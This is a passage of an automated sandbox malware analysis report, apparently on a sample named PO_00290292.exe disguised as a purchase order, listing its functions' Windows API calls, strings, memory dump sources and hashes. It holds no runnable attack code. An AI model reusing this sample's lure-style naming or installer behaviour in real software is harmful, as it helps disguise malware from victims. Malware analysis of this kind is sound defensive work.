                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040447D
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404491
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044AE
                                                                  • GetSysColor.USER32(?), ref: 004044BF
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
                                                                  • lstrlenW.KERNEL32(?), ref: 004044E0
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040455B
                                                                  • SendMessageW.USER32(00000000), ref: 00404562
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040458D
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
                                                                  • SetCursor.USER32(00000000), ref: 004045E1
                                                                  • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 004045F6
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404602
                                                                  • SetCursor.USER32(00000000), ref: 00404605
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404634
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: N$Remove folder: $VC@$open
                                                                  • API String ID: 3615053054-2721566001
                                                                  • Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                  • Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
                                                                  • Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                  • Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                  • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                                  • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                  • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405EAD Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405EBC
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00406040,?,?), ref: 00405EE0
                                                                  • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9
                                                                    • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                                    • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                                  • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
                                                                  • wsprintfA.USER32 ref: 00405F24
                                                                  • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                  • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040600D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014
                                                                    • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405D57
                                                                    • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                                  • API String ID: 222337774-899692902
                                                                  • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                                  • Instruction ID: 52ae09e4e2a5e81e4d5588e003ad531eff1fe7f7ae6e2de5146a23cae23f7ad9
                                                                  • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                                  • Instruction Fuzzy Hash: EB315330241B19BBD2206B209D08F2B3A5CEF85758F15043BF942F62C2EA7CC9118EBD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406412 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                                  • CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                                  • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\PO_00290292.exe", xrefs: 00406412
                                                                  • *?|<>/":, xrefs: 00406464
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-3491917242
                                                                  • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                                  • Instruction ID: c1b46f2de1f90aebbf911330ce555e940da56993e608f70b6a8db31027969b8c
                                                                  • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                                  • Instruction Fuzzy Hash: 5311C85680121299DB307B588C40AB7A2B8EF55754F52803FEDCA732C1E77C5C9286BD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004042A9 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004042C6
                                                                  • GetSysColor.USER32(00000000), ref: 004042E2
                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042EE
                                                                  • SetBkMode.GDI32(?,?), ref: 004042FA
                                                                  • GetSysColor.USER32(?), ref: 0040430D
                                                                  • SetBkColor.GDI32(?,?), ref: 0040431D
                                                                  • DeleteObject.GDI32(?), ref: 00404337
                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404341
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                  • Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
                                                                  • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                  • Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                    • Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4A
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                  • String ID: 9
                                                                  • API String ID: 163830602-2366072709
                                                                  • Opcode ID: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                                  • Instruction ID: fbd7f9394f7a40dbbdef10ea3a20ac1ae57b35180e29dd1ddeb30b88b5afce05
                                                                  • Opcode Fuzzy Hash: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                                  • Instruction Fuzzy Hash: 19510774D00219ABDF209F94CA88AAEB779FF04344F50447BE501B72E0D7B99982DB69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                  • GetTickCount.KERNEL32 ref: 00402DD8
                                                                  • wsprintfW.USER32 ref: 00402E06
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                    • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                    • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                    • Part of subcall function 00402D83: MulDiv.KERNEL32(00000000,00000064,000013DE), ref: 00402D98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 722711167-2449383134
                                                                  • Opcode ID: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
                                                                  • Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
                                                                  • Opcode Fuzzy Hash: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
                                                                  • Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404BA7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
                                                                  • GetMessagePos.USER32 ref: 00404BCA
                                                                  • ScreenToClient.USER32(?,?), ref: 00404BE4
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                  • Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
                                                                  • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                  • Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D59
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                  • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
